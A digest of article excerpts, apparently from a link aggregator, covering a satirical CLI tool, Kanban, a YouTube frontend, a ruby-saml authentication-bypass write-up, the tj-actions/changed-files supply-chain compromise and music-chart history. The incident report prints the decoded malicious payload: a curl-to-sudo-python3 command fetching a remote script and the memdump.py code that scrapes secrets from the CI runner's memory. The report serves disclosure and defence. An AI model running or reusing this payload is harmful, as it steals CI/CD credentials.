10 interesting stories served every morning and every evening.
Why learn actual skills when you can just look impressive instead?
Introducing rust-stakeholder - a CLI tool that generates absolutely meaningless but impressive-looking terminal output to convince everyone you’re a coding genius without writing a single line of useful code.
“After using rust-stakeholder, my boss stopped asking about my deadlines and started asking for my insights during board meetings.” - Developer who still hasn’t completed their tickets from last sprint
Remember, it’s not about your actual contribution to the codebase, it’s about how complicated your terminal looks when the VP of Engineering walks by. Nothing says “I’m vital to this company” like 15 progress bars, cryptic error messages you seem unfazed by, and technical jargon nobody understands.
* 🖥️ Dazzling Development Simulations: Make it look like you’re solving CERN-level computing problems when you’re actually just refreshing Reddit
* 🧠 Meaningless Jargon Generator: Impress with phrases like “Implemented non-euclidean topology optimization for multi-dimensional data representation” (no, it doesn’t mean anything)
* 📊 Convincing Progress Bars: Nothing says “I’m working” like a progress bar slowly advancing while you’re in the break room
* 🌐 Fake Network Activity: Simulate mission-critical API requests that are actually just your computer talking to itself
* 👥 Imaginary Team Activity: Pretend your invisible friends are sending you important pull requests
* 🎮 Domain Chameleon: Switch between backend, frontend, blockchain and 7 other domains faster than you can say “full-stack developer”
Or build from source (warning: might involve actual programming):
docker build -t rust-stakeholder .
All commands below can be used through:
docker run -t –rm rust-stakeholder [arguments]
# Impress the blockchain VC investors
rust-stakeholder –dev-type blockchain –jargon extreme –alerts
# Look busy during performance review season
rust-stakeholder –complexity extreme –team –duration 1800
# Convince everyone you’re a 10x game developer
rust-stakeholder –dev-type game-development –framework “Custom Engine” –jargon high
# For the data science frauds
rust-stakeholder –dev-type data-science –jargon extreme –project “Neural-Quantum-Blockchain-AI”
# Emergency mode: Your project is due tomorrow and you haven’t started
rust-stakeholder –dev-type fullstack –complexity extreme –alerts –team
* Promotion Fast-Track: Skip the tedious “delivering value” step entirely
* Meeting Domination: Let it run in the background during Zoom calls to seem busy
* Deadline Extensions: “Sorry, still resolving those critical system alerts”
* Salary Negotiation Tool: Just leave it running during your performance review
* Job Security: Become the only person who seems to understand your fictional systems
“I left rust-stakeholder running over the weekend. When I came back on Monday, I had been promoted to Principal Engineer.” - Anonymous
“My manager doesn’t know what I do, and thanks to rust-stakeholder, neither do I.” - Satisfied User
“Since installing rust-stakeholder, my colleagues have stopped asking me for help because my work ‘looks too advanced’.” - Senior Imposter Engineer
Currently, this package has the same amount of test coverage as your excuses for missing deadlines - absolutely none.
Much like your actual development skills while using this tool, tests are purely theoretical at this point. But, if you’re feeling particularly productive between fake terminal sessions, consider adding some!
After all, nothing says “I’m a serious developer with impostor syndrome” like meticulously testing a package designed to help you fake being a developer. It’s beautifully recursive.
Contributing? That would involve actual coding. But if you insist:
Fork the repo (whatever that means)
Submit a PR and pretend you understand the codebase
rust-stakeholder is satire. If your entire technical reputation is built on running a fake terminal program, I am not responsible for the inevitable moment when someone asks you to actually, you know, code something.
I am also not responsible if you accidentally impress your way into a position you’re completely unqualified for. Though if that happens, congratulations on your new career in management.
...
Read the original on github.com »
When people say Kanban, they tend to think of a specific set of practices. Whiteboards & sticky notes (both almost universally virtual). Tasks moving through columns that represent workflow. Every now and then, WIP limits even.
As often as we do it with other things, it reduces a broader principle to a set of oversimplified techniques, which, in turn, tend to underdeliver in many contexts.
In its original meaning, Kanban represented a visual signal. The thing that communicated, well, something. It might have been a need, option, availability, capacity, request, etc.
In our Kanban systems, the actual Kanban is a sticky note.
It represents work, and given its closest environment (board, columns, other stickies, visual decorators), it communicates what needs, or needs not, to be done.
If it’s yellow, it’s a regular feature. If there’s a blocker on it, it requests focus. If there’s a long queue of neighbors, it suggests flow inefficiency. If it’s a column named “ready for…” it communicates available work and/or handoff.
A visual signal all the way.
Let’s decouple ourselves from the most standard Kanban board design. Let’s forget columns, sticky notes, and all that jazz.
Enters Kasia, our office manager at Lunar. One of the many things Kasia takes care of is making sure we don’t run out of kitchen supplies. The tricky part is that when you don’t drink milk yourself, it becomes a pain to check the cupboard with milk reserves every now and then to ensure we’re stocked.
Then, one day, I found this.
A simple index card taped to the last milk carton in a row stating, “Bring me to Kasia.” That’s it.
In the context, it really says that:
* we’re running out of (specific kind of) milk
* we want to restock soon
* there’s enough time to make an order (we don’t drink that much of cappuccinos and macchiatos)
But it’s just a visual signal. Kanban at its very core.
What Kasia designed is a perfect Kanban system. It relies on visual signals, which are put in the context. Even better, unlike most Kanban boards I see across teams, the system is self-explanatory. Everything one needs to know is written on the index card.
That’s, by the way, another characteristic of a good Kanban system. It should be as simple as possible (but not simpler). Our workflow representations tend to get more and more complex over time by themselves; we don’t need to make them so from the outset.
It’s a safe assumption that, almost always, there’s a simpler visualization that would work just as well. We, process designers, often fall into the trap of overengineering our tools.
And it’s a healthy wake-up call when someone who knows close to nothing about our fancy stuff designs a system that we would unlikely think of. One that is a perfect implementation of the original spirit, even if it doesn’t follow any of the common techniques.
Because it’s all about principles, not practices.
That’s what we can learn from Milk Kanban.
...
Read the original on brodzinski.com »
A clean and minimal youtube frontend, without all the ads and whistles. Supported by yt-dlp, and optionally your local AI model, to make your youtube experience local, mindful, succint and ad free.
* Download videos from YouTube, using yt-dlp behind the scenes
* Ignore videos you don’t want to watch
* No dependencies (except for nano-spawn, which itself has no transient deps)
* HTML/CSS only, no JS frameworks on client/server side
* Host it in your home network to playback videos on all your devices
* Just JSON files for persistence, stupid simple management and backup
git clone https://github.com/christian-fei/my-yt.git
cd my-yt
npm i
# install yt-dlp, please see https://github.com/yt-dlp/yt-dlp
npm start
git clone https://github.com/christian-fei/my-yt.git
cd my-yt
docker compose up –build -d
docker run -p 3000:3000 -v /path/to/your/data/folder/for/persistence:/app/data christianfei/my-yt:latest
* wanted to get back my chronological feed, instead of a “algorithmically curated” one
you can just go to the “Subscriptions” page if you want to see your YouTube videos in chronological order, as gently pointed out on HN
* you can just go to the “Subscriptions” page if you want to see your YouTube videos in chronological order, as gently pointed out on HN
* no clickbait thumbnails (using mq2 instead of mqdefault thumbnail, thanks @drcheap)
* no related videos, or any algorithmically determined videos pushed in your face
* no ads (in “just skip the sponsors”)
* wanted to try integrate the so much hyped AI in a personal project
* wanted to try out yt-dlp
* wanted to experiment with the HTML5 element and WebVTT API
* just wanted to make this, ok?
* I am even paying for YouTube Premium, so it’s not a matter of money, but a matter of control over my attention and enhanced offline experience
* Make it possible to delete downloaded videos
* Have a way to view a video at a reasonable size in between the small preview and full screen
* Add a way to download a single video without subscribing to a channel
* Specify LLM server endpoint
List and choose available model to use for summarization
* List and choose available model to use for summarization
* add some options for download quality (with webm merge for 4k support)
Here are some links to help you understand the project better:
Makes requests using the chat completions API of LMStudio.
yt-dlp wrapper to download videos, get channel videos and video information and transcript
Handles persistence of video information (set video as downloaded, summary, ignored, upserting videos, etc.)
dependency less, bare HTML5, CSS3 and JS for a basic frontend
Currently, on the LLM side of things:
* supports basic chat completions API (LMStudio right now)
expects lms server to be running on http://localhost:1234
* expects lms server to be running on http://localhost:1234
* customization will come in the future if there’s enough interest (let me know by opening an issue or pull-request)
Download the project while you can before I get striked with a DMCA takedown request
...
Read the original on github.com »
Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0. Attackers who are in possession of a single valid signature that was created with the key used to validate SAML responses or assertions of the targeted organization can use it to construct SAML assertions themselves and are in turn able to log in as any user. In other words, it could be used for an account takeover attack. Users of ruby-saml should update to version 1.18.0. References to libraries making use of ruby-saml (such as omniauth-saml) need also be updated to a version that reference a fixed version of ruby-saml.
In this blog post, we detail newly discovered authentication bypass vulnerabilities in the ruby-saml library used for single sign-on (SSO) via SAML on the service provider (application) side. GitHub doesn’t currently use ruby-saml for authentication, but began evaluating the use of the library with the intention of using an open source library for SAML authentication once more. This library is, however, used in other popular projects and products. We discovered an exploitable instance of this vulnerability in GitLab, and have notified their security team so they can take necessary actions to protect their users against potential attacks.
GitHub previously used the ruby-saml library up to 2014, but moved to our own SAML implementation due to missing features in ruby-saml at that time. Following bug bounty reports around vulnerabilities in our own implementation (such as CVE-2024-9487, related to encrypted assertions), GitHub recently decided to explore the use of ruby-saml again. Then in October 2024, a blockbuster vulnerability dropped: an authentication bypass in ruby-saml (CVE-2024-45409) by ahacker1. With tangible evidence of exploitable attack surface, GitHub’s switch to ruby-saml had to be evaluated more thoroughly now. As such, GitHub started a private bug bounty engagement to evaluate the security of the ruby-saml library. We gave selected bug bounty researchers access to GitHub test environments using ruby-saml for SAML authentication. In tandem, the GitHub Security Lab also reviewed the attack surface of the ruby-saml library.
As is not uncommon when multiple researchers are looking at the same code, both ahacker1, a participant in the GitHub bug bounty program, and I noticed the same thing during code review: ruby-saml was using two different XML parsers during the code path of signature verification. Namely, REXML and Nokogiri. While REXML is an XML parser implemented in pure Ruby, Nokogiri provides an easy-to-use wrapper API around different libraries like libxml2, libgumbo and Xerces (used for JRuby). Nokogiri supports parsing of XML and HTML. It looks like Nokogiri was added to ruby-saml to support canonicalization and potentially other things REXML didn’t support at that time.
We both inspected the same code path in the validate_signature of xml_security.rb and found that the signature element to be verified is first read via REXML, and then also with Nokogiri’s XML parser. So, if REXML and Nokogiri could be tricked into retrieving different signature elements for the same XPath query it might be possible to trick ruby-saml into verifying the wrong signature. It looked like there could be a potential authentication bypass due to a parser differential!
The reality was actually more complicated than this.
Roughly speaking, four stages were involved in the discovery of this authentication bypass:
Discovering that two different XML parsers are used during code review.
Establishing if and how a parser differential could be exploited.
Finding an actual parser differential for the parsers in use.
To prove the security impact of this vulnerability, it was necessary to complete all four stages and create a full-blown authentication bypass exploit.
Security assertion markup language (SAML) responses are used to transport information about a signed-in user from the identity provider (IdP) to the service provider (SP) in XML format. Often the only important information transported is a username or an email address. When the HTTP POST binding is used, the SAML response travels from the IdP to the SP via the browser of the end user. This makes it obvious why there has to be some sort of signature verification in play to prevent the user from tampering with the message.
Let’s have a quick look at what a simplified SAML response looks like:
Note: in the response above the XML namespaces were removed for better readability.
As you might have noticed: the main part of a simple SAML response is its assertion element (A), whereas the main information contained in the assertion is the information contained in the Subject element (B) (here the NameID containing the username: admin). A real assertion typically contains more information (e.g. NotBefore and NotOnOrAfter dates as part of a Conditions element.)
Normally, the Assertion (A) (without the whole Signature part) is canonicalized and then compared against the DigestValue (C) and the SignedInfo (D) is canonicalized and verified against the SignatureValue (E). In this sample, the assertion of the SAML response is signed, and in other cases the whole SAML response is signed.
We learned that ruby-saml used two different XML parsers (REXML and Nokogiri) for validating the SAML response. Now let’s have a look at the verification of the signature and the digest comparison.
The focus of the following explanation lies on the validate_signature method inside of xml_security.rb.
Inside that method, there’s a broad XPath query with REXML for the first signature element inside the SAML document:
sig_element = REXML::XPath.first(
@working_copy,
“//ds:Signature”,
{“ds”=>DSIG}
Hint: When reading the code snippets, you can tell the difference between queries for REXML and Nokogiri by looking at how they are called. REXML methods are prefixed with REXML::, whereas Nokogiri methods are called on document.
Later, the actual SignatureValue is read from this element:
base64_signature = REXML::XPath.first(
sig_element,
″./ds:SignatureValue”,
{“ds” => DSIG}
signature = Base64.decode64(OneLogin::RubySaml::Utils.element_text(base64_signature))
Note: the name of the Signature element might be a bit confusing. While it contains the actual signature in the SignatureValue node it also contains the part that is actually signed in the SignedInfo node. Most importantly the DigestValue element contains the digest (hash) of the assertion and information about the used key.
So, an actual Signature element could look like this (removed namespace information for better readability):
Later in the same method (validate_signature) there’s again a query for the Signature(s)—but this time with Nokogiri.
noko_sig_element = document.at_xpath(‘//ds:Signature’, ‘ds’ => DSIG)
Then the SignedInfo element is taken from that signature and canonicalized:
noko_signed_info_element = noko_sig_element.at_xpath(‘./ds:SignedInfo’, ‘ds’ => DSIG)
canon_string = noko_signed_info_element.canonicalize(canon_algorithm)
Let’s remember this canon_string contains the canonicalized SignedInfo element.
The SignedInfo element is then also extracted with REXML:
signed_info_element = REXML::XPath.first(
sig_element,
″./ds:SignedInfo”,
{ “ds” => DSIG }
From this SignedInfo element the Reference node is read:
ref = REXML::XPath.first(signed_info_element, ”./ds:Reference”, {“ds”=>DSIG})
Now the code queries for the referenced node by looking for nodes with the signed element id using Nokogiri:
reference_nodes = document.xpath(“//*[@ID=$id]”, nil, { ‘id’ => extract_signed_element_id })
The method extract_signed_element_id extracts the signed element id with help of REXML. From the previous authentication bypass (CVE-2024-45409), there’s now a check that only one element with the same ID can exist.
The first of the reference_nodes is taken and canonicalized:
hashed_element = reference_nodes[0][..]canon_hashed_element = hashed_element.canonicalize(canon_algorithm, inclusive_namespaces)
The canon_hashed_element is then hashed:
hash = digest_algorithm.digest(canon_hashed_element)
The DigestValue to compare it against is then extracted with REXML:
encoded_digest_value = REXML::XPath.first(
ref,
″./ds:DigestValue”,
{ “ds” => DSIG }
digest_value = Base64.decode64(OneLogin::RubySaml::Utils.element_text(encoded_digest_value))
Finally, the hash (built from the element extracted by Nokogiri) is compared against the digest_value (extracted with REXML):
unless digests_match?(hash, digest_value)
The canon_string extracted some lines ago (a result of an extraction with Nokogiri) is later verified against signature (extracted with REXML).
unless cert.public_key.verify(signature_algorithm.new, signature, canon_string)
In the end, we have the following constellation:
The assertion is extracted and canonicalized with Nokogiri, and then hashed. In contrast, the hash against which it will be compared is extracted with REXML.
The SignedInfo element is extracted and canonicalized with Nokogiri - it is then verified against the SignatureValue, which was extracted with REXML.
The question is: is it possible to create an XML document where REXML sees one signature and Nokogiri sees another?
It turns out, yes.
Ahacker1, participating in the bug bounty, was faster to produce a working exploit using a parser differential. Among other things, ahacker1 was inspired by the XML roundtrips vulnerabilities published by Mattermost’s Juho Forsén in 2021.
Not much later, I produced an exploit using a different parser differential with the help of Trail of Bits’ Ruby fuzzer called ruzzy.
Both exploits result in an authentication bypass. Meaning that an attacker, who is in possession of a single valid signature that was created with the key used to validate SAML responses or assertions of the targeted organization, can use it to construct assertions for any users which will be accepted by ruby-saml. Such a signature can either come from a signed assertion or response from another (unprivileged) user or in certain cases, it can even come from signed metadata of a SAML identity provider (which can be publicly accessible).
An exploit could look like this. Here, an additional Signature was added as part of the StatusDetail element that is only visible to Nokogiri:
The SignedInfo element (A) from the signature that is visible to Nokogiri is canonicalized and verified against the SignatureValue (B) that was extracted from the signature seen by REXML.
The assertion is retrieved via Nokogiri by looking for its ID. This assertion is then canonicalized and hashed (C). The hash is then compared to the hash contained in the DigestValue (D). This DigestValue was retrieved via REXML. This DigestValue has no corresponding signature.
So, two things take place:
* A valid SignedInfo with DigestValue is verified against a valid signature. (which checks out)
* A fabricated canonicalized assertion is compared against its calculated digest. (which checks out as well)
This allows an attacker, who is in possession of a valid signed assertion for any (unprivileged) user, to fabricate assertions and as such impersonate any other user.
Parts of the currently known, undisclosed exploits can be stopped by checking for Nokogiri parsing errors on SAML responses. Sadly, those errors do not result in exceptions, but need to be checked on the errors member of the parsed document:
doc = Nokogiri::XML(xml) do |config|
config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
end
raise “XML errors when parsing: ” + doc.errors.to_s if doc.errors.any?
While this is far from a perfect fix for the issues at hand, it renders at least one exploit infeasible.
We are not aware of any reliable indicators of compromise. While we’ve found a potential indicator of compromise, it only works in debug-like environments and to publish it, we would have to reveal too many details about how to implement a working exploit so we’ve decided that it’s better not to publish it. Instead, our best recommendation is to look for suspicious logins via SAML on the service provider side from IP addresses that do not align with the user’s expected location.
Some might say it’s hard to integrate systems with SAML. That might be true. However, it’s even harder to write implementations of SAML using XML signatures in a secure way. As others have stated before: it’s probably best to disregard the specifications, as following them doesn’t help build secure implementations.
To rehash how the validation works if the SAML assertion is signed, let’s have a look at the graphic below, depicting a simplified SAML response. The assertion, which transports the protected information, contains a signature. Confusing, right?
To complicate it even more: What is even signed here? The whole assertion? No!
What’s signed is the SignedInfo element and the SignedInfo element contains a DigestValue. This DigestValue is the hash of the canonicalized assertion with the signature element removed before the canonicalization. This two-stage verification process can lead to implementations that have a disconnect between the verification of the hash and the verification of the signature. This is the case for these Ruby-SAML parser differentials: while the hash and the signature check out on their own, they have no connection. The hash is actually a hash of the assertion, but the signature is a signature of a different SignedInfo element containing another hash. What you actually want is a direct connection between the hashed content, the hash, and the signature. (And once the verification is done you only want to retrieve information from the exact part that was actually verified.) Or, alternatively, use a less complicated standard to transport a cryptographically signed username between two systems - but here we are.
In this case, the library already extracted the SignedInfo and used it to verify the signature of its canonicalized string,canon_string. However, it did not use it to obtain the digest value. If the library had used the content of the already extracted SignedInfo to obtain the digest value, it would have been secure in this case even with two XML parsers in use.
As shown once again: relying on two different parsers in a security context can be tricky and error-prone. That being said: exploitability is not automatically guaranteed in such cases. As we have seen in this case, checking for Nokogiri errors could not have prevented the parser differential, but could have stopped at least one practical exploitation of it.
The initial fix for the authentication bypasses does not remove one of the XML parsers to prevent API compatibility problems. As noted, the more fundamental issue was the disconnect between verification of the hash and verification of the signature, which was exploitable via parser differentials. The removal of one of the XML parsers was already planned for other reasons, and will likely come as part of a major release in combination with additional improvements to strengthen the library. If your company relies on open source software for business-critical functionality, consider sponsoring them to help fund their future development and bug fix releases.
If you’re a user of ruby-saml library, make sure to update to the latest version, 1.18.0, containing fixes for CVE-2025-25291 and CVE-2025-25292. References to libraries making use of ruby-saml (such as omniauth-saml) need also be updated to a version that reference a fixed version of ruby-saml. We will publish a proof of concept exploit at a later date in the GitHub Security Lab repository.
Special thanks to Sixto Martín, maintainer of ruby-saml, and Jeff Guerra from the GitHub Bug Bounty program.
Special thanks also to ahacker1 for giving inputs to this blog post.
* 2024-11-04: Bug bounty report demonstrating an authentication bypass was reported against a GitHub test environment evaluating ruby-saml for SAML authentication.
* 2024-11-12: A second authentication bypass was found by Peter that renders the planned mitigations for the first useless.
* 2024-11-14: Both parser differentials are reported to ruby-saml, the maintainer responds immediately.
* 2024-11-14: The work on potential patches by the maintainer and ahacker1 begins. (One of the initial ideas was to remove one of the XML parsers, but this was not feasible without breaking backwards compatibility).
* 2025-02-16: The maintainer starts working on a fix with the idea to be backwards-compatible and easier to understand.
* 2025-02-17: Initial contact with GitLab to coordinate a release of their on-prem product with the release of the ruby-saml library.
...
Read the original on github.blog »
We are actively investigating a critical security incident involving the tj-actions/changed-files GitHub Action. While our investigation is ongoing, we want to alert users so they can take immediate corrective actions. We will keep this post updated as we learn more. StepSecurity Harden-Runner detected this issue through anomaly detection when an unexpected endpoint appeared in the network traffic. Based on our analysis, the incident started around 9:00 AM March 14th, 2025 Pacific Time (PT) / 4:00 PM March 14th, 2025 UTC. StepSecurity has released a free secure drop-in replacement for this Action to help recover from the incident: step-security/changed-files. We highly recommend you replace all instances of tj-actions/changed-files with the StepSecurity secure alternatives.
Update 1: Most versions of tj-actions/changed-files are compromised.
Update 2: We have detected multiple public repositories have leaked secrets in build logs. As these build logs are public, anyone can steal these secrets. If you maintain any public repositories that use this Action, please review the recovery steps immediately.
Update 3: GitHub has removed the tj-actions/changed-files Action. GitHub Actions workflows can no longer use this Action.
The tj-actions/changed-files GitHub Action, which is currently used in over 23,000 repositories, has been compromised. In this attack, the attackers modified the action’s code and retroactively updated multiple version tags to reference the malicious commit. The compromised Action prints CI/CD secrets in GitHub Actions build logs. If the workflow logs are publicly accessible (such as in public repositories), anyone could potentially read these logs and obtain exposed secrets. There is no evidence that the leaked secrets were exfiltrated to any remote network destination.
Our Harden-Runner solution flagged this issue when an unexpected endpoint appeared in the workflow’s network traffic. This anomaly was caught by Harden-Runner’s behavior-monitoring capability.
The compromised Action now executes a malicious Python script that dumps CI/CD secrets from the Runner Worker process. Most of the existing Action release tags have been updated to refer to the malicious commit mentioned below (@stevebeattie notified us about this). Note: All these tags now point to the same malicious commit hash:0e58ed8671d6b60d0890c21b07f8835ace038e67, indicating the retroactive compromise of multiple versions.”
$ git tag -l | while read -r tag ; do git show –format=“$tag: %H” –no-patch $tag ; done | sort -k2
v1.0.0: 0e58ed8671d6b60d0890c21b07f8835ace038e67
v35.7.7-sec: 0e58ed8671d6b60d0890c21b07f8835ace038e67
v44.5.1: 0e58ed8671d6b60d0890c21b07f8835ace038e67
v5: 0e58ed8671d6b60d0890c21b07f8835ace038e67
@salolivares has identified the malicious commit that introduces the exploit code in the Action.
The base64 encoded string in the above screenshot contains the exploit code. Here is the base64 decoded version of the code.
if [[ “$OSTYPE” == “linux-gnu” ]]; then
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d ‘\0’ | grep -aoE ‘“[^“]+”:\{“value”:“[^“]*”,“isSecret”:true\}’ | sort -u | base64 -w 0 | base64 -w 0`
echo $B64_BLOB
else
exit 0
fi
Here is the content of https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py
#!/usr/bin/env python3
def get_pid():
# https://stackoverflow.com/questions/2703640/process-list-on-linux-via-python
pids = [pid for pid in os.listdir(‘/proc’) if pid.isdigit()]
for pid in pids:
with open(os.path.join(‘/proc’, pid, ‘cmdline’), ‘rb’) as cmdline_f:
if b’Runner.Worker’ in cmdline_f.read():
return pid
raise Exception(‘Can not get pid of Runner.Worker’)
if __name__ == “__main__”:
pid = get_pid()
print(pid)
map_path = f”/proc/{pid}/maps”
mem_path = f”/proc/{pid}/mem”
with open(map_path, ‘r’) as map_f, open(mem_path, ‘rb’, 0) as mem_f:
for line in map_f.readlines(): # for each mapped region
m = re.match(r’([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])’, line)
if m.group(3) == ‘r’: # readable region
start = int(m.group(1), 16)
end = int(m.group(2), 16)
# hotfix: OverflowError: Python int too large to convert to C long
# 18446744073699065856
if start > sys.maxsize:
continue
mem_f.seek(start) # seek to region start
try:
chunk = mem_f.read(end - start) # read region contents
sys.stdout.buffer.write(chunk)
except OSError:
continue
Even though GitHub shows renovate as the commit author, most likely the commit did not actually come up renovate bot. The commit is an un-verified commit, so likely the adversary provided renovate as the commit author to hide their tracks.
StepSecurity Harden-Runner secures CI/CD workflows by controlling network access and monitoring activities on GitHub-hosted and self-hosted runners. The name “Harden-Runner” comes from its purpose: strengthening the security of the runners used in GitHub Actions workflows. The Harden-Runner community tier is free for open-source projects. In addition, it offers several enterprise features.
When this Action is executed with Harden-Runner, you can see the malicious code in action. We reproduced the exploit in a test repository. When the compromised tj-actions/changed-files action runs, Harden-Runner’s insights clearly show it downloading and executing a malicious Python script that attempts to dump sensitive data from the GitHub Actions runner’s memory. You can see the behavior here:
To reproduce this, you can run the following workflow:
name: “tj-action changed-files incident”
on:
pull_request:
branches:
- main
permissions:
pull-requests: read
jobs:
changed_files:
runs-on: ubuntu-latest
name: Test changed-files
steps:
- name: Harden Runner
uses: step-security/harden-runner@v2
with:
disable-sudo: true
egress-policy: audit
- uses: actions/checkout@v4
with:
fetch-depth: 0
# Example 1
- name: Get changed files
id: changed-files
uses: tj-actions/changed-files@v35
- name: List all changed files
run: |
for file in ${{ steps.changed-files.outputs.all_changed_files }}; do
echo “$file was changed”
done
When this workflow is executed, you can see the malicious behavior through Harden-Runner:
When this workflow runs, you can observe the malicious behavior in the Harden-Runner insights page. The compromised Action downloads and executes a malicious Python script, which attempts to dump sensitive data from the Actions Runner process memory.
🚨 If you are using any version of the tj-actions/changed-files Action, we strongly recommend you stop using it immediately until the incident is resolved. To support the community during this incident, we have released a free, secure, and drop-in replacement: step-security/changed-files. We recommend updating all instances of j-actions/changed-files in your workflows to this StepSecurity-maintained Action.
To use the StepSecurity maintained Action, simply replace all instances of “tj-actions/changed-files@vx” with “step-security/changed-files@3dbe17c78367e7d60f00d78ae6781a35be47b4a1 # v45.0.1″ or “step-security/changed-files@v45”.
For enhanced security, you can pin to the specific commit SHA:
jobs:
changed_files:
runs-on: ubuntu-latest
- name: Get changed files
id: changed-files
uses: step-security/changed-files@v45
You can also reference the Action through its latest release tag:
jobs:
changed_files:
runs-on: ubuntu-latest
...
Read the original on www.stepsecurity.io »
Hi folks. I’m Will Larson.
If you’re looking to reach out to me, here are ways I help. If you’d like to get a email from me, subscribe to my weekly newsletter.
...
Read the original on lethain.com »
Welcome back to Can’t Get Much Higher, the internet’s top destination for using numbers to understand music and the music industry. This newsletter is made possible by my readers. Consider upgrading to a paid subscription to get access to interviews, link roundups, and other fun features. If not, continue on to a murderous story.
When you ask people about the most consequential years in popular music, there might be no year that comes up more often than 1964. Of course, the most important thing about that year is The Beatles landing in the United States and kicking off the British Invasion. But the year is endlessly discussed because so much else went on.
* Motown became a dominant force in pop music, releasing four number ones, three of which were by The Supremes
* The Beach Boys continued their run of hits
Sometimes it even felt like there were more consequential releases in a single week than there were in entire decades. Take the top five songs on the Billboard Hot 100 from the week of August 15 as an example:
“Where Did Our Love Go” by The Supremes“Rag Doll” by Frankie Valli & the Four Seasons“Under the Boardwalk” by The Drifters
These are five songs that I return to often. And weeks like this weren’t even that rare in 1964. Just one week later, you had the same songs in the top five, except “Rag Doll” was replaced by The Animals’ “House of the Rising Son,” the song that some claim made Dylan go electric and pushed rock music into a completely new direction.
The one claim that’s always fascinated me about 1964 is that it was a line of demarcation between an old and a new way to make music. If you were making hits in 1963 and didn’t change your sound in 1964, you were going to be waiting tables by the beginning of 1965. In other words, The Beatles-led British Invasion decimated the careers of scores of artists. But was this really the case?
The sound of rock music undoubtedly changed between the beginning and middle of the 1960s. But by looking at the Billboard Hot 100, we can see if that change in sound was being made by a fleet of new groups or a bunch of older acts adapting.
To do this, I grabbed a list of all 175 acts who released at least one top 40 single in 1963. (Fun fact: the record for the most top 40 hits that year was shared by five acts: Bobby Vinton, Brenda Lee, Dion & the Belmonts, Ray Charles, and The Beach Boys. Each had six top 40 hits.) I then decided to see which of those acts never released a hit in 1964 or any year after. In total, 88 of those 175 acts, or 50%, never had a top 40 hit again.
That’s kind of a lot. In other words, The Beatles and their fellow invading Brits killed a lot of careers. Or did they? By looking at only a single year we could be biased. And we are.
If we calculate that same rate for every single year between 1960 and 2020, we see that while the kill rate in 1964 was high, it wasn’t completely out of the ordinary. The median is around 40%. Having a multi-year career as a popular artist is just hard. By looking at the years with the highest rates, we can glean a few other things, though.
First, three of the top ten rates are 1962, 1963, and 1964. In other words, there is some credence to the theory that the British Invasion decimated many careers. Nevertheless, the fact that the rates in 1962 and 1963 are high tells me that sonic changes were brewing in the United States too. Had The Beatles not arrived, rock music probably still would have evolved in a way that would have left earlier hitmakers in the dust. That sonic evolution would have been different, though.
Second, why are half of the years in the top 10 between 1990 and 1999? Part of this is a data quirk. In 1991, Billboard changed their chart methodology. Overnight, hip-hop and country were better represented on the chart. Thus, there was a ton of artist turnover. At the same time, I think we underrate how tumultuous music was in the 1990s. Here are some oddities from that decade that I noted when discussing the swing revival in an earlier newsletter:
In other words, the 1990s were strange. And I think we are just beginning to grapple with that strangeness. Because of that, there was a ton of turnover on the charts. It’s hard for artists to keep up with trends when grunge, gangsta rap, swing, and a new breed of teen pop are all successful in a matter of years. Being a superstar isn’t easy.
Aggregating this data got me thinking about which artists have been able to survive the most musical changes and still find success. While there are artists, like Elton John and The Rolling Stones, who put out hits for decades, I want to point out one artist whose resilience still shocks me: Frankie Valli.
Born in 1934, Valli had his first major hit in 1962 with “Sherry,” a song performed with his group The Four Seasons. Before The Beatles splashed on American shores, Valli and his bandmates had eight more top 40 hits. But they were the kind of group that you’d expect to be decimated by the new sound of rock music. The Four Seasons were sort of a throwback even in 1963, Valli and his falsetto pointing toward the doo-wop of the last decade.
But Valli and his collaborators forged on. They made some musical missteps but they remained a musical force through 1967, releasing bonafide classics, like “Can’t Take My Eyes Off You.” Okay. So, he survived the British Invasion. Some others did too. But Valli didn’t go quietly as the 1960s came to a close.
In 1974, he scored a massive hit with “My Eyes Adored You,” a song that played well with the soft rock that was dominant at the time. Then disco began to boom and Valli remained undeterred. “Swearin’ to God.” “Who Loves You.” “December, 1963 (Oh, What a Night).” The man could not be stopped.
The fact that Valli topped the charts again in 1978 with “Grease” still boggles my mind. I don’t think anybody who heard “Sherry” in 1962 thought that he’d be within a country mile of the charts 12 years later. By the time the hit musical Jersey Boys was made about his life in 2005, his legend was firmly established. But long before that, I was tipping my cap to him.
I’ll admit that I hopped on the Doechii train late. Like many others, I first listened to her album Alligator Bites Never Heal after it won Best Rap Album at the 67th Grammy Awards. No matter how late I was, I’m happy that I’m here now. Not only is Doechii dextrous as a rapper but all of her beats are groovy and twitchy in a way that feels fresh. “Nosebleeds,” her victory lap after the Grammy win, has all of those things on display.
As I was admiring 1964, I noticed that the week of October 10 had a mind-blowing top five. It included Roy Orbison’s “Oh, Pretty Woman,” Manfred Mann’s “Do Wah Diddy Diddy,” Martha & the Vandellas’ “Dancing in the Street,” and The Shangri-Las’ “Remember (Walkin’ in the Sand).” There was one song that I wasn’t familiar with, though: “Bread and Butter” by The Newbeats.
“Bread and Butter” is fun, little novelty about bread, butter, toast, jam, and losing your lover. The most notable thing about the song is a half-screamed falsetto that appears periodically throughout the song as performed by Larry Henley. Incidentally, Henley is another good example of musical resilience. After his performing career ended, he wrote a few hits over the decades, including Bette Midler’s massive 1989 ballad “Wind Beneath My Wings.”
Shout out to the paid subscribers who allow this newsletter to exist. Along with getting access to our entire archive, subscribers unlock biweekly interviews with people driving the music industry, monthly round-ups of the most important stories in music, and priority when submitting questions for our mailbag. Consider becoming a paid subscriber today!
Recent Paid Subscriber Interviews: Pitchfork’s Editor-in-Chief • Classical Pianist • Spotify’s Former Data Guru • Music Supervisor • John Legend Collaborator • Wedding DJ • What It’s Like to Go Viral • Adele Collaborator
Recent Newsletters: Personalized Lies • The Lostwave Story • Blockbuster Nostalgia • Weird Band Names • Recorded Music is a Hoax • A Frank Sinatra Mystery • The 40-Year Test
Want to hear the music that I make? Check out my latest single “Overloving” wherever you stream music.
...
Read the original on www.cantgetmuchhigher.com »
